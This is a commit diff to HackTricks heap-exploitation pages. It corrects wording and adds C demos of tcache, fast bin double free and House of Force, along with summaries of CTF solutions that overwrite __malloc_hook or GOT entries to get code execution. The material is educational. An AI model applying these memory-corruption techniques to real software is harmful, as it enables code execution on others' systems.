mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-21 20:23:18 +00:00
commit
b5f7c74d46
15 changed files with 146 additions and 85 deletions
|
@ -29,7 +29,7 @@ Therefore, a tcache is similar to a fast bin per thread in the way that it's a *
|
|||
**When a thread frees** a chunk, **if it isn't too big** to be allocated in the tcache and the respective tcache bin **isn't full** (already 7 chunks), **it'll be allocated in there**. If it cannot go to the tcache, it'll need to wait for the heap lock to be able to perform the free operation globally.
|
||||
|
||||
When a **chunk is allocated**, if there is a free chunk of the needed size in the **Tcache, it'll use it**; if not, it'll need to wait for the heap lock to be able to find one in the global bins or create a new one.\
|
||||
There also an optimization, in this case, while having the heap lock, the thread **will fill his Tcache with heap chunks (7) of the requested size**, so if case it needs more, it'll find them in Tcache.
|
||||
There's also an optimization: in this case, while holding the heap lock, the thread **will fill its Tcache with heap chunks (7) of the requested size**, so in case it needs more, it'll find them in the Tcache.
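A minimal sketch of that behaviour (assuming glibc ≥ 2.26 and a single thread; addresses will vary):

```c
#include <stdio.h>
#include <stdlib.h>

int main(void) {
    void *a = malloc(0x48);
    printf("a = %p\n", a);
    free(a);                 // the chunk goes into the (non-full) 0x50 tcache bin
    void *b = malloc(0x48);  // served straight from the tcache: same address, no global bins involved
    printf("b = %p\n", b);   // prints the same address as `a`
    return 0;
}
```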
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -179,10 +179,10 @@ Additionally, **fast bins use singly linked lists**, not double linked, which fu
|
|||
|
||||
Basically, what happens here is that the header (the pointer to the first chunk to check) is always pointing to the latest freed chunk of that size. So:
|
||||
|
||||
* When a new chunk is allocated of that size, the header is pointing to a free chunk to use. As this free chunk is pointing to the next one to use, this address is stored in the header so the next allocation knows where to get ana available chunk
|
||||
* When a new chunk is allocated of that size, the header is pointing to a free chunk to use. As this free chunk is pointing to the next one to use, this address is stored in the header so the next allocation knows where to get an available chunk
|
||||
* When a chunk is freed, the free chunk will save the address to the current available chunk and the address to this newly freed chunk will be put in the header
|
||||
|
||||
The maximum size of a linked list is `0x80` and they are organized so a chunk of size `0x20-0x2f` will be in index `0`, a chunk of size `0x30-0x3f` would bi in `idx` `1`...
|
||||
The maximum size of a linked list is `0x80` and they are organized so a chunk of size `0x20` will be in index `0`, a chunk of size `0x30` would be in index `1`...
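For reference, this is how the index is derived from the chunk size on 64-bit systems (a simplified re-implementation of glibc's `fastbin_index` macro, shown only to illustrate the mapping):

```c
#include <stdio.h>

// Simplified from glibc's fastbin_index macro on 64-bit (SIZE_SZ == 8): (size >> 4) - 2
static unsigned fast_bin_index(unsigned size) {
    return (size >> 4) - 2;
}

int main(void) {
    for (unsigned size = 0x20; size <= 0x80; size += 0x10)
        printf("chunk size 0x%x-0x%x -> fast bin index %u\n", size, size + 0xf, fast_bin_index(size));
    return 0;
}
```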
|
||||
|
||||
{% hint style="danger" %}
|
||||
Chunks in fast bins aren't set as available, so they are kept as fast bin chunks for some time instead of being merged with other free chunks surrounding them.
|
||||
|
@ -256,7 +256,7 @@ int main(void)
|
|||
|
||||
Note how we allocate and free 8 chunks of the same size so they fill the tcache and the eighth one is stored in the fast bin.
|
||||
|
||||
Compile it and debug it with a breakpoint in the ret opcode from main function. then with gef you can see the tcache bin fill and the one chunk in the fast bin:
|
||||
Compile it and debug it with a breakpoint in the `ret` opcode of the `main` function. Then with `gef` you can see that the tcache bin is full and one chunk is in the fast bin:
|
||||
|
||||
```bash
|
||||
gef➤ heap bins
|
||||
|
@ -275,7 +275,7 @@ The unsorted bin is a **cache** used by the heap manager to make memory allocati
|
|||
|
||||
When a program **asks for memory**, the heap manager **checks the unsorted bin** to see if there's a chunk of enough size. If it finds one, it uses it right away. If it doesn't find a suitable chunk in the unsorted bin, it moves all the chunks in this list to their corresponding bins, either small or large, based on their size.
|
||||
|
||||
Note that if a larger chunk is split in 2 halves and the rest is larger than MINSIZE, it'll be paced back into the unsorted bin. 
|
||||
Note that if a larger chunk is split in 2 halves and the rest is larger than MINSIZE, it'll be placed back into the unsorted bin.
|
||||
|
||||
So, the unsorted bin is a way to speed up memory allocation by quickly reusing recently freed memory and reducing the need for time-consuming searches and merges.
|
||||
|
||||
|
@ -315,9 +315,9 @@ int main(void)
|
|||
}
|
||||
```
|
||||
|
||||
Note how we allocate and free 9 chunks of the same size so they **fill the tcache** and the eight one is stored in the unsorted bin because it's **too big for the fastbin** and the ninth one isn't freed so the ninth and the eights **don't get merged with the top chunk**.
|
||||
Note how we allocate and free 9 chunks of the same size so they **fill the tcache** and the eighth one is stored in the unsorted bin because it's **too big for the fastbin** and the ninth one isn't freed so the ninth and the eighth **don't get merged with the top chunk**.
|
||||
|
||||
Compile it and debug it with a breakpoint in the ret opcode from main function. then with gef you can see the tcache bin fill and the one chunk in the unsorted bin:
|
||||
Compile it and debug it with a breakpoint in the `ret` opcode of the `main` function. Then with `gef` you can see that the tcache bin is full and one chunk is in the unsorted bin:
|
||||
|
||||
```bash
|
||||
gef➤ heap bins
|
||||
|
@ -408,7 +408,7 @@ int main(void)
|
|||
|
||||
Note how we allocate and free 9 chunks of the same size so they **fill the tcache** and the eighth one is stored in the unsorted bin because it's **too big for the fastbin** and the ninth one isn't freed so the ninth and the eighth **don't get merged with the top chunk**. Then we allocate a bigger chunk of 0x110 which makes **the chunk in the unsorted bin go to the small bin**.
|
||||
|
||||
Compile it and debug it with a breakpoint in the ret opcode from main function. then with gef you can see the tcache bin fill and the one chunk in the small bin:
|
||||
Compile it and debug it with a breakpoint in the `ret` opcode of the `main` function. Then with `gef` you can see that the tcache bin is full and one chunk is in the small bin:
|
||||
|
||||
```bash
|
||||
gef➤ heap bins
|
||||
|
@ -447,7 +447,7 @@ There are:
|
|||
* 8 bins of 4096B range (partly colliding with small bins)
|
||||
* 4 bins of 32768B range
|
||||
* 2 bins of 262144B range
|
||||
* 1bin for reminding sizes
|
||||
* 1 bin for remaining sizes
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -514,7 +514,7 @@ int main(void)
|
|||
|
||||
2 large allocations are performed, then one is freed (putting it in the unsorted bin) and a bigger allocation is made (moving the free one from the unsorted bin to the large bin).
|
||||
|
||||
Compile it and debug it with a breakpoint in the ret opcode from main function. then with gef you can see the tcache bin fill and the one chunk in the large bin:
|
||||
Compile it and debug it with a breakpoint in the `ret` opcode of the `main` function. Then with `gef` you can see that the tcache bin is full and one chunk is in the large bin:
|
||||
|
||||
```bash
|
||||
gef➤ heap bin
|
||||
|
@ -590,7 +590,7 @@ int main(void)
|
|||
}
|
||||
```
|
||||
|
||||
After compiling and debugging it with a break point in the ret opcode of main I saw that the malloc returned the address: `0xaaaaaaac12a0` and these are the chunk:
|
||||
After compiling and debugging it with a breakpoint in the `ret` opcode of `main` I saw that malloc returned the address `0xaaaaaaac12a0` and these are the chunks:
|
||||
|
||||
```bash
|
||||
gef➤ heap chunks
|
||||
|
@ -605,7 +605,7 @@ Chunk(addr=0xaaaaaaac16d0, size=0x410, flags=PREV_INUSE | IS_MMAPPED | NON_MAIN_
|
|||
Chunk(addr=0xaaaaaaac1ae0, size=0x20530, flags=PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA) ← top chunk
|
||||
```
|
||||
|
||||
Where it can be seen that the top chunk is at address `0xaaaaaaac1ae0`. This is no surprise because the lates allocated chunk was in `0xaaaaaaac12a0` with a size of `0x410` and `0xaaaaaaac12a0 + 0x410 = 0xaaaaaaac1ae0` .\
|
||||
Where it can be seen that the top chunk is at address `0xaaaaaaac1ae0`. This is no surprise because the last allocated chunk was at `0xaaaaaaac12a0` with a size of `0x410` and `0xaaaaaaac12a0 + 0x410 = 0xaaaaaaac1ae0`.\
|
||||
It's also possible to see the length of the Top chunk in its chunk header:
|
||||
|
||||
```bash
|
||||
|
@ -616,9 +616,9 @@ gef➤ x/8wx 0xaaaaaaac1ae0 - 16
|
|||
|
||||
</details>
|
||||
|
||||
### Last Reminder
|
||||
### Last Remainder
|
||||
|
||||
When malloc is used and a chunk is divided (from the unlinked list or from the top chunk for example), the chunk created from the rest of the divided chunk is called Last Reminder and it's pointer is stored in the `malloc_state` struct.
|
||||
When malloc is used and a chunk is divided (from the unsorted bin or from the top chunk for example), the chunk created from the rest of the divided chunk is called Last Remainder and its pointer is stored in the `malloc_state` struct.
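A small demo of this splitting behaviour (a sketch; the sizes are chosen so the chunks skip the tcache and fast bins, and the exact behaviour depends on the glibc version):

```c
#include <stdio.h>
#include <stdlib.h>

int main(void) {
    char *a = malloc(0x800);   // too big for the tcache: free() will send it to the unsorted bin
    malloc(0x18);              // guard chunk: prevents consolidation with the top chunk
    free(a);

    char *b = malloc(0x100);   // carved from the freed chunk: b == a
    char *c = malloc(0x100);   // carved from the last remainder: c == b + 0x110
    printf("a=%p b=%p c=%p\n", (void *)a, (void *)b, (void *)c);
    return 0;
}
```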
|
||||
|
||||
## Allocation Flow
|
||||
|
||||
|
|
|
@ -16,7 +16,7 @@ Other ways to support HackTricks:
|
|||
|
||||
## Basic Information
|
||||
|
||||
If you free a block of memory more than once, it can mess up the allocator's data and open the door to attacks. Here's how it happens: when you free a block of memory, it goes back into a list of free chunks (e.g. the "fastbin"). If you free the same block twice in a row, the allocator detects this and throws an error. But if you **free another chunk in between, the double-free check is bypassed**, causing corruption.
|
||||
If you free a block of memory more than once, it can mess up the allocator's data and open the door to attacks. Here's how it happens: when you free a block of memory, it goes back into a list of free chunks (e.g. the "fast bin"). If you free the same block twice in a row, the allocator detects this and throws an error. But if you **free another chunk in between, the double-free check is bypassed**, causing corruption.
|
||||
|
||||
Now, when you ask for new memory (using `malloc`), the allocator might give you a **block that's been freed twice**. This can lead to two different pointers pointing to the same memory location. If an attacker controls one of those pointers, they can change the contents of that memory, which can cause security issues or even allow them to execute code.
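A condensed sketch of what the example later in this page does (assuming glibc ≥ 2.26 with tcache): the tcache bin is filled first so the frees land in the fast bin, where the only double-free check is against the head of the bin.

```c
#include <stdio.h>
#include <stdlib.h>

int main(void) {
    void *fill[7], *a, *b;
    for (int i = 0; i < 7; i++) fill[i] = malloc(0x28);
    a = malloc(0x28);
    b = malloc(0x28);

    for (int i = 0; i < 7; i++) free(fill[i]);  // fill the 0x30 tcache bin (7 entries)
    free(a);                                    // goes to the fast bin
    free(b);                                    // the fast bin head is now b
    free(a);                                    // double free: a != head (b), so the check passes

    for (int i = 0; i < 7; i++) malloc(0x28);   // drain the tcache again
    void *c1 = malloc(0x28), *c2 = malloc(0x28), *c3 = malloc(0x28);
    // Two of these three pointers alias the same chunk (which pair depends on the glibc version)
    printf("c1=%p c2=%p c3=%p\n", c1, c2, c3);
    return 0;
}
```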
|
||||
|
||||
|
@ -94,7 +94,7 @@ int main() {
|
|||
}
|
||||
```
|
||||
|
||||
In this example, after filling the tcache with several freed chunks, the code **frees chunk `h`, then chunk `i`, and then `h` again, causing a double-free error**. This opens the possibility of receiving overlapping memory addresses when reallocating, meaning two or more pointers can point to the same memory location. Manipulating data through one pointer can then affect the other, creating a critical security risk and potential for exploitation.
|
||||
In this example, after filling the tcache with several freed chunks (7), the code **frees chunk `h`, then chunk `i`, and then `h` again, causing a double free** (also known as Fast Bin dup). This opens the possibility of receiving overlapping memory addresses when reallocating, meaning two or more pointers can point to the same memory location. Manipulating data through one pointer can then affect the other, creating a critical security risk and potential for exploitation.
|
||||
|
||||
Executing it, note how **`i1` and `i2` got the same address**:
|
||||
|
||||
|
@ -121,6 +121,22 @@ h1: 0xaaab0f0c2380
|
|||
</strong><strong>i2: 0xaaab0f0c23a0
|
||||
</strong></code></pre>
|
||||
|
||||
## Examples
|
||||
|
||||
* [**Dragon Army. Hack The Box**](https://7rocky.github.io/en/ctf/htb-challenges/pwn/dragon-army/)
|
||||
* We can only allocate Fast-Bin-sized chunks except for size `0x70`, which prevents the usual `__malloc_hook` overwrite.
|
||||
* Instead, we use PIE addresses that start with `0x56` as a target for Fast Bin dup (1/2 chance).
|
||||
* One place where PIE addresses are stored is in `main_arena`, which is inside Glibc and near `__malloc_hook`
|
||||
* We target a specific offset of `main_arena` to allocate a chunk there and continue allocating chunks until reaching `__malloc_hook` to get code execution.
|
||||
* [**zero_to_hero. PicoCTF**](https://7rocky.github.io/en/ctf/picoctf/binary-exploitation/zero_to_hero/)
|
||||
* Using Tcache bins and a null-byte overflow, we can achieve a double-free situation:
|
||||
* We allocate three chunks of size `0x110` (`A`, `B`, `C`)
|
||||
* We free `B`
|
||||
* We free `A` and allocate again to use the null-byte overflow
|
||||
* Now `B`'s size field is `0x100`, instead of `0x111`, so we can free it again
|
||||
* We have one Tcache-bin of size `0x110` and one of size `0x100` that point to the same address. So we have a double free.
|
||||
* We leverage the double free using [Tcache poisoning](tcache-bin-attack.md)
|
||||
|
||||
## References
|
||||
|
||||
* [https://heap-exploitation.dhavalkapil.com/attacks/double\_free](https://heap-exploitation.dhavalkapil.com/attacks/double\_free)
|
||||
|
|
|
@ -22,7 +22,7 @@ For more information about what is a fast bin check this page:
|
|||
[bins-and-memory-allocations.md](bins-and-memory-allocations.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
Because the fast bin is single linked, there are much less protections than in other bins and just **modifying an address in a freed fast bin** chunk is enough to be able to **allocate later a chunk in any memory address**.
|
||||
Because the fast bin is a singly linked list, there are far fewer protections than in other bins and just **modifying an address in a freed fast bin** chunk is enough to be able to **later allocate a chunk at any memory address**.
|
||||
|
||||
In summary:
|
||||
|
||||
|
@ -136,26 +136,30 @@ int main(void)
|
|||
```
|
||||
|
||||
{% hint style="danger" %}
|
||||
If it's possible to overwrite the value of the global variable **`global_max_fast`** with a big number, this allows to generate fast bin of bigger sizes, potentially allowing to perform fast bin attacks in scenarios where it wasn't possible previously.
|
||||
If it's possible to overwrite the value of the global variable **`global_max_fast`** with a big number, this allows generating fast bin chunks of bigger sizes, potentially allowing to perform fast bin attacks in scenarios where it wasn't possible previously. This situation is useful in the context of the [large bin attack](large-bin-attack.md) and [unsorted bin attack](unsorted-bin-attack.md).
|
||||
{% endhint %}
|
||||
|
||||
## Examples
|
||||
|
||||
* **CTF** [**https://guyinatuxedo.github.io/28-fastbin\_attack/0ctf\_babyheap/index.html**](https://guyinatuxedo.github.io/28-fastbin\_attack/0ctf\_babyheap/index.html)**:**
|
||||
* It's possible to alloc chunks, free then, read their contents and fill them (with an overflow vulnerability).
|
||||
* **Consolidate chunk for infoleak**: The technique is basically to abuse the overflow to crate a fake prev\_size so one previous chunks is put inside a bigger one, so when allocating the bigger one containing another chunk, it's possible to print it's data an leak an address to libc (main\_arena+88).
|
||||
* **Overwrite malloc hook**: For this, and abusing the previous overlapping situation, it was possible to have 2 chunks that was pointing to the same memory. Therefore, freeing them both (freeing another chunk in between to avoid protections) it was possible to have the same chunk in the fast bin 2 times. Then, it was possible to allocate it again, overwrite the address to the next chunk to point a bit before malloc\_hook (so it points to an integer that malloc thinks is a free size - another bypass), allocate it again and then allocate another chunk that will receive an address to malloc hooks.\
|
||||
* It's possible to allocate chunks, free them, read their contents and fill them (with an overflow vulnerability).
|
||||
* **Consolidate chunk for infoleak**: The technique is basically to abuse the overflow to create a fake `prev_size` so a previous chunk is put inside a bigger one, so when allocating the bigger one containing another chunk, it's possible to print its data and leak an address to libc (`main_arena+88`).
|
||||
* **Overwrite malloc hook**: For this, and abusing the previous overlapping situation, it was possible to have 2 chunks that were pointing to the same memory. Therefore, freeing them both (freeing another chunk in between to avoid protections) it was possible to have the same chunk in the fast bin 2 times. Then, it was possible to allocate it again, overwrite the address to the next chunk to point a bit before `__malloc_hook` (so it points to an integer that malloc thinks is a free size - another bypass), allocate it again and then allocate another chunk that will receive the address of `__malloc_hook`.\
|
||||
Finally a **one gadget** address was written there.
|
||||
* **CTF** [**https://guyinatuxedo.github.io/28-fastbin\_attack/csaw17\_auir/index.html**](https://guyinatuxedo.github.io/28-fastbin\_attack/csaw17\_auir/index.html)**:**
|
||||
* There is a heap overflow and user after free and double free because when a chunk is freed it's possible to reuse and re-free the pointers
|
||||
* There is a heap overflow, a use after free and a double free because when a chunk is freed it's possible to reuse and re-free the pointers
|
||||
* **Libc info leak**: Just free some chunks and they will get a pointer to a part of the main arena location. As you can reuse freed pointers, just read this address.
|
||||
* **Fast bin attack**: All the pointers to the allocations are stored inside an array, so we can free a couple of fast bin chunks and in the last one overwrite the address to point a bit before this array of pointers. Then, allocate a couple of chunks with the same size and we will get first the legit one and then the fake one containing the array of pointers. We can now overwrite this allocation pointers to point to the got address of `free` to point to system and then write chunk 1 `"/bin/sh"` to then `free(chunk1)` which will execute `system("/bin/sh")`.
|
||||
* **Fast bin attack**: All the pointers to the allocations are stored inside an array, so we can free a couple of fast bin chunks and in the last one overwrite the address to point a bit before this array of pointers. Then, allocate a couple of chunks with the same size and we will get first the legit one and then the fake one containing the array of pointers. We can now overwrite these allocation pointers to make the GOT address of `free` point to `system` and then write `"/bin/sh"` in chunk 1 to then call `free(chunk1)`, which instead will execute `system("/bin/sh")`.
|
||||
* **CTF** [**https://guyinatuxedo.github.io/33-custom\_misc\_heap/csaw19\_traveller/index.html**](https://guyinatuxedo.github.io/33-custom\_misc\_heap/csaw19\_traveller/index.html)
|
||||
* Another example of abusing a 1B overflow to consolidate chunks in the unsorted bin and get a libc infoleak and then perform a fast bin attack to overwrite malloc hook with a one gadget address
|
||||
* Another example of abusing a one byte overflow to consolidate chunks in the unsorted bin and get a libc infoleak and then perform a fast bin attack to overwrite malloc hook with a one gadget address
|
||||
* **CTF** [**https://guyinatuxedo.github.io/33-custom\_misc\_heap/csaw18\_alienVSsamurai/index.html**](https://guyinatuxedo.github.io/33-custom\_misc\_heap/csaw18\_alienVSsamurai/index.html)
|
||||
* After an infoleak abusing the unsorted bin with a UAF to leak a libc address and a PIE address, the exploit of this CTF used a fast bin attack to allocate a chunk in a place where the pointers to controlled chunks were located so it was possible to overwrite certain pointers to write a one gadget in the GOT
|
||||
* You can find a Fast Bin attack abused through an unsorted bin attack:
|
||||
* Note that it's common before performing fast bin attacks to abuse the unliked list to leak libc/heap addresses (when needed).
|
||||
* Note that it's common before performing fast bin attacks to abuse the free-lists to leak libc/heap addresses (when needed).
|
||||
* [**Robot Factory. BlackHat MEA CTF 2022**](https://7rocky.github.io/en/ctf/other/blackhat-ctf/robot-factory/)
|
||||
* We can only allocate chunks of size greater than `0x100`.
|
||||
* Overwrite `global_max_fast` using an Unsorted Bin attack (works 1/16 times due to ASLR, because we need to modify 12 bits, but we must modify 16 bits).
|
||||
* Fast Bin attack to modify a global array of chunks. This gives an arbitrary read/write primitive, which allows modifying the GOT and setting some function to point to `system`.
|
||||
|
||||
{% content-ref url="unsorted-bin-attack.md" %}
|
||||
[unsorted-bin-attack.md](unsorted-bin-attack.md)
|
||||
|
|
|
@ -21,14 +21,14 @@ A heap overflow is like a [**stack overflow**](../stack-overflow/) but in the he
|
|||
In stack overflows we know that some registers like the instruction pointer or the stack frame are going to be restored from the stack and it could be possible to abuse this. In case of heap overflows, there **isn't any sensitive information stored by default** in the heap chunk that can be overflowed. However, it could be sensitive information or pointers, so the **criticality** of this vulnerability **depends** on **which data could be overwritten** and how an attacker could abuse this.
|
||||
|
||||
{% hint style="success" %}
|
||||
In order to find overflow offsets you can use the same patters as in [**stack overflows**](../stack-overflow/#finding-stack-overflows-offsets).
|
||||
In order to find overflow offsets you can use the same patterns as in [**stack overflows**](../stack-overflow/#finding-stack-overflows-offsets).
|
||||
{% endhint %}
|
||||
|
||||
### Stack Overflows vs Heap Overflows
|
||||
|
||||
In stack overflows the arrangement and the data that are going to be present in the stack at the moment the vulnerability can be triggered are fairly reliable. This is because the stack is linear and always grows in contiguous memory: in **specific places of the program run the stack memory usually stores similar kinds of data** and it has some specific structure with some pointers at the end of the stack part used by each function.
|
||||
|
||||
However, in the case of a heap overflow, because the used memory isn’t linear but **allocated chunks of are usually in separated positions of memory** (not one next to the other) because of **bins and zones** separating allocations by size and because **previous freed memory is used** before allocating new chunks. It’s **complicated to know the object that is going to be colliding with the one vulnerable** to a heap overflow. So, when a heap overflow is found, it’s needed to find a **reliable way to make the desired object to be next in memory** from the one that can be overflowed.
|
||||
However, in the case of a heap overflow, the used memory isn’t linear but **allocated chunks are usually in separate positions of memory** (not one next to the other) because of **bins and zones** separating allocations by size and because **previously freed memory is used** before allocating new chunks. It’s **complicated to know the object that is going to be colliding with the one vulnerable** to a heap overflow. So, when a heap overflow is found, it’s needed to find a **reliable way to make the desired object be next in memory** to the one that can be overflowed.
|
||||
|
||||
One of the techniques used for this is **Heap Grooming** which is used for example [**in this post**](https://azeria-labs.com/grooming-the-ios-kernel-heap/). In the post it’s explained how in the iOS kernel, when a zone runs out of memory to store chunks, it's expanded by a kernel page, and this page is split into chunks of the expected sizes which are used in order (until iOS version 9.2; since then these chunks are used in a randomised way to make the exploitation of these attacks harder).
|
||||
|
||||
|
@ -54,6 +54,12 @@ In the page [https://8ksec.io/arm64-reversing-and-exploitation-part-1-arm-instru
|
|||
python3 -c 'print("/"*0x400+"/bin/ls\x00")' > hax.txt
|
||||
```
|
||||
|
||||
### Other examples
|
||||
|
||||
* [**Auth-or-out. Hack The Box**](https://7rocky.github.io/en/ctf/htb-challenges/pwn/auth-or-out/)
|
||||
* We use an Integer Overflow vulnerability to get a Heap Overflow.
|
||||
* We corrupt pointers to a function inside a `struct` of the overflowed chunk to set a function such as `system` and get code execution.
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
|
|
@ -29,8 +29,8 @@ Other ways to support HackTricks:
|
|||
|
||||
* Create a fake chunk when we want to allocate a chunk:
|
||||
* Set pointers to point to itself to bypass sanity checks
|
||||
* Off by one over from one chunk to another to modify the prev in use
|
||||
* Indicate in the `prev_size` of the off-by-one abused chunk the difference between itself and the fake chunk
|
||||
* One-byte overflow with a null byte from one chunk to the next one to modify the `PREV_INUSE` flag.
|
||||
* Indicate in the `prev_size` of the off-by-null abused chunk the difference between itself and the fake chunk
|
||||
* The fake chunk's size must also have been set to the same size to bypass sanity checks
|
||||
* For constructing these chunks, you will need a heap leak.
|
||||
|
||||
|
@ -44,17 +44,19 @@ Other ways to support HackTricks:
|
|||
* Then, `C` is freed so it consolidates with the fake chunk `A`
|
||||
* Then, a new chunk `D` is created which will start in the fake `A` chunk and cover the `B` chunk
|
||||
* The house of Einherjar finishes here
|
||||
* This can be continued with a fast bin attack:
|
||||
* Free `B` to add it to the fast bin
|
||||
* This can be continued with a fast bin attack or Tcache poisoning:
|
||||
* Free `B` to add it to the fast bin / Tcache
|
||||
* `B`'s `fd` is overwritten, making it point to the target address, abusing the `D` chunk (as it contains `B` inside)
|
||||
* Then, 2 mallocs are done and the second one is going to be **allocating the target address**
|
||||
|
||||
## References and other examples
|
||||
|
||||
* [https://github.com/shellphish/how2heap/blob/master/glibc\_2.35/house\_of\_einherjar.c](https://github.com/shellphish/how2heap/blob/master/glibc\_2.35/house\_of\_einherjar.c)
|
||||
* [https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/house\_of\_einherjar/#2016-seccon-tinypad](https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/house\_of\_einherjar/#2016-seccon-tinypad)
|
||||
* **CTF** [**https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/house\_of\_einherjar/#2016-seccon-tinypad**](https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/house\_of\_einherjar/#2016-seccon-tinypad)
|
||||
* After freeing pointers they aren't nullified, so it's still possible to access their data. Therefore a chunk is placed in the unsorted bin and the pointers it contains are leaked (libc leak), and then a new chunk is placed in the unsorted bin and a heap address is leaked from the pointer it gets.
|
||||
|
||||
* [**baby-talk. DiceCTF 2024**](https://7rocky.github.io/en/ctf/other/dicectf/baby-talk/)
|
||||
* Null-byte overflow bug in `strtok`.
|
||||
* Use House of Einherjar to get an overlapping chunks situation and finish with Tcache poisoning to get an arbitrary write primitive.
|
||||
|
||||
<details>
|
||||
|
||||
|
|
|
@ -51,8 +51,8 @@ Then, calculate the distance between the address of the top chunk and the target
|
|||
*/
|
||||
```
|
||||
|
||||
Therefore, allocing a size of `target - old_top - 4*sizeof(long)` (the 4 longs are because of the metadata of the top chunk and of the new chunk when alloced) will move the top chunk to the address we want to overwrite.\
|
||||
Then, do another malloc to get a chunk containing the at the beginning of the data to write the target address.
|
||||
Therefore, allocating a size of `target - old_top - 4*sizeof(long)` (the 4 longs are because of the metadata of the top chunk and of the new chunk when allocated) will move the top chunk to the address we want to overwrite.\
|
||||
Then, do another malloc to get a chunk at the target address.
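A minimal sketch of that calculation, in the spirit of how2heap's `house_of_force.c`. It assumes an old glibc (< 2.29, before the top chunk size checks) and that a heap overflow lets us set the top chunk size; `target_area` is just a hypothetical victim buffer for the sketch.

```c
#include <stdio.h>
#include <stdlib.h>

// We aim malloc() at &target_area[2]; the surrounding slots absorb the chunk metadata
// written around the returned pointer (16-byte alignment keeps the arithmetic exact).
static long target_area[10] __attribute__((aligned(16)));

int main(void) {
    setbuf(stdout, NULL);        // avoid a later stdio allocation from the relocated top chunk

    long *p = malloc(0x18);      // chunk right below the top chunk
    long *target = &target_area[2];

    p[3] = -1;                   // heap-overflow primitive: the top chunk size becomes "infinite"

    // Distance from the current top chunk to the target, minus the metadata of the huge
    // chunk we request and of the relocated top chunk (the 4*sizeof(long) from the text).
    unsigned long old_top = (unsigned long)p + 0x10;
    unsigned long evil_size = (unsigned long)target - sizeof(long) * 4 - old_top;

    malloc(evil_size);           // moves the top chunk to just before `target`
    long *hax = malloc(0x18);    // carved from the relocated top chunk: lands on `target`
    printf("target: %p  new chunk: %p\n", (void *)target, (void *)hax);
    return 0;
}
```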
|
||||
|
||||
### References & Other Examples
|
||||
|
||||
|
|
|
@ -22,33 +22,33 @@ Other ways to support HackTricks:
|
|||
* This isn't working
|
||||
* Or: [https://github.com/shellphish/how2heap/blob/master/glibc\_2.39/house\_of\_lore.c](https://github.com/shellphish/how2heap/blob/master/glibc\_2.39/house\_of\_lore.c)
|
||||
* This isn't working even if it tries to bypass some checks getting the error: `malloc(): unaligned tcache chunk detected`
|
||||
* This example is still working**:** [**https://guyinatuxedo.github.io/40-house\_of\_lore/house\_lore\_exp/index.html**](https://guyinatuxedo.github.io/40-house\_of\_lore/house\_lore\_exp/index.html) 
|
||||
* This example is still working: [**https://guyinatuxedo.github.io/40-house\_of\_lore/house\_lore\_exp/index.html**](https://guyinatuxedo.github.io/40-house\_of\_lore/house\_lore\_exp/index.html) 
|
||||
|
||||
### Goal
|
||||
|
||||
* Insert a **fake small chunk in the small bin so then it's possible to allocate it**.\
|
||||
Note that the small chunk added is the fake one the attacker creates a not a fake one in a arbitrary position.
|
||||
Note that the small chunk added is the fake one the attacker creates and not a fake one in an arbitrary position.
|
||||
|
||||
### Requirements
|
||||
|
||||
* Create 2 fake chunks and link them with them and with the legit chunk in the small bin:
|
||||
* Create 2 fake chunks and link them together and with the legit chunk in the small bin:
|
||||
* `fake0.bk` -> `fake1`
|
||||
* `fake1.fd` -> `fake0`
|
||||
* `fake0.fd` -> `legit` (you need to modify a pointer in the freed small bin chunk via some other vuln)
|
||||
* `legit.bk` -> `fake0`
|
||||
|
||||
The you will be able to allocate `fake0`.
|
||||
Then you will be able to allocate `fake0`.
|
||||
|
||||
### Attack
|
||||
|
||||
* A small chunk (`legit`) is allocated, then another one is allocated to prevent consolidating with top chunk. Then, legit is freed (moving it to the unsorted list) and the a larger chunk is allocated, **moving `legit` it to the small bin.**
|
||||
* An attacker generates a couple of fake small chunks, and makes the need linking to bypass sanity checks:
|
||||
* A small chunk (`legit`) is allocated, then another one is allocated to prevent consolidating with the top chunk. Then, `legit` is freed (moving it to the unsorted bin list) and then a larger chunk is allocated, **moving `legit` to the small bin.**
|
||||
* An attacker generates a couple of fake small chunks, and makes the needed linking to bypass sanity checks:
|
||||
* `fake0.bk` -> `fake1`
|
||||
* `fake1.fd` -> `fake0`
|
||||
* `fake0.fd` -> `legit` (you need to modify a pointer in the freed small bin chunk via some other vuln)
|
||||
* `legit.bk` -> `fake0`
|
||||
* A small chunk is allocated to get `legit`, making **`fake0`** the head of the small bin list
|
||||
* Another small chunk is allocated, getting fake0 as a chunk, allowing potentially to read/write pointers inside of it.
|
||||
* Another small chunk is allocated, getting `fake0` as a chunk, allowing potentially to read/write pointers inside of it.
|
||||
|
||||
## References
|
||||
|
||||
|
|
|
@ -16,17 +16,17 @@ Other ways to support HackTricks:
|
|||
|
||||
### Requirements
|
||||
|
||||
1. **Ability to Modify Fastbin fd Pointer or Size**: This means you can change the forward pointer of a chunk in the fastbin or its size.
|
||||
2. **Ability to Trigger `malloc_consolidate`**: This can be done by either allocating a large chunk or merging the top chunk, which forces the heap to consolidate chunks.
|
||||
1. **Ability to modify fast bin fd pointer or size**: This means you can change the forward pointer of a chunk in the fastbin or its size.
|
||||
2. **Ability to trigger `malloc_consolidate`**: This can be done by either allocating a large chunk or merging the top chunk, which forces the heap to consolidate chunks.
|
||||
|
||||
### Goals
|
||||
|
||||
1. **Create Overlapping Chunks**: To have one chunk overlap with another, allowing for further heap manipulations.
|
||||
2. **Forge Fake Chunks**: To trick the allocator into treating a fake chunk as a legitimate chunk during heap operations.
|
||||
1. **Create overlapping chunks**: To have one chunk overlap with another, allowing for further heap manipulations.
|
||||
2. **Forge fake chunks**: To trick the allocator into treating a fake chunk as a legitimate chunk during heap operations.
|
||||
|
||||
## Steps of the Attack
|
||||
## Steps of the attack
|
||||
|
||||
### POC 1: Modify the Size of a Fastbin Chunk
|
||||
### POC 1: Modify the size of a fast bin chunk
|
||||
|
||||
